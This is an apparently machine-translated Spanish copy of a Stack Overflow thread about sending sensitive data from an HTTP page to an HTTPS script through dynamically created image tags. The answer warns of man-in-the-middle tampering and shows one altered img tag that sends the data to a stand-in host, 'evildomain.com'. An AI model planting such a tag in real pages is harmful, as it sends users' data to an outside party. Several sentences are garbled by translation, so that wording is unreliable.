http, https y de derivación ajax, tal vez?
https://stackoverflow.com/questions/1541329
-
20-09-2019 - |
italiano
english
français
española
中国
日本の
العربية
Deutsch
한국어
Português
RussianPregunta
Tengo un script de servidor que necesito para pasar datos a desde el navegador sin necesidad de recargar la página (también conocido como Ajax). Los datos son sensibles por lo que debe ser enviada a través de https. Sin embargo la página está en la capa de http. Debido a la misma restricción de dominio / protocolo, el navegador no permite esto.
Estoy pensando en engañar al sistema un poco a la creación dinámica de las etiquetas de imagen y llamar a la secuencia de comandos con la etiqueta src tales como:
<img src="https://mydomain.com/mysecurescript/&data=to&pass=to&my=script" />
Me gustaría saber si este hecho se cifrará correctamente.
Solución
El problema con esto es que si la propia página sólo HTTP, entonces es susceptible a un hombre en medio del ataque. Un atacante puede simplemente modificar el script en la página enviada a través de HTTP para que utilice en su lugar:
<img src="http://evildomain.com/evilproxyscript/&data=to&pass=to&my=script" />
El usuario ninguno de los de más prudente. Para evitar esto que realmente necesita para servir a la página a través de HTTPS también -. Que resuelve perfectamente el otro problema, al mismo tiempo
(Esta es exactamente la misma razón por formas de la conexión deben estar en páginas HTTPS, en lugar de sólo la acción forma de ser HTTPS).
Otros consejos
Sí y no.
La porción de dirección del servidor de la URL, obviamente, no se cifra ya que se utiliza para establecer la conexión.
Todo lo demás está cifrada tiempo que se envían a través de una conexión HTTPS. Pero cualquiera que vea la fuente, obviamente, será capaz de ver los datos que se publican.
También vale la pena mencionar que algunos navegadores no mostrarán (o advertirá al usuario antes de mostrar) páginas HTML modo mixto (http vs. HTTPS). En algunos casos, esto puede no funcionar debido a que el usuario selecciona para bloquearlo.
Una posible alternativa a la técnica de imagen (el inconveniente de que, como se ha mencionado por otros, es que el contenido de modo mixto no es tratada amablemente por algunos navegadores) sería por ASSL .
Cualquiera de los métodos de cifrado se traducirá en sucediendo, y ambos siguen siendo vulnerables a los hombre en el medio.
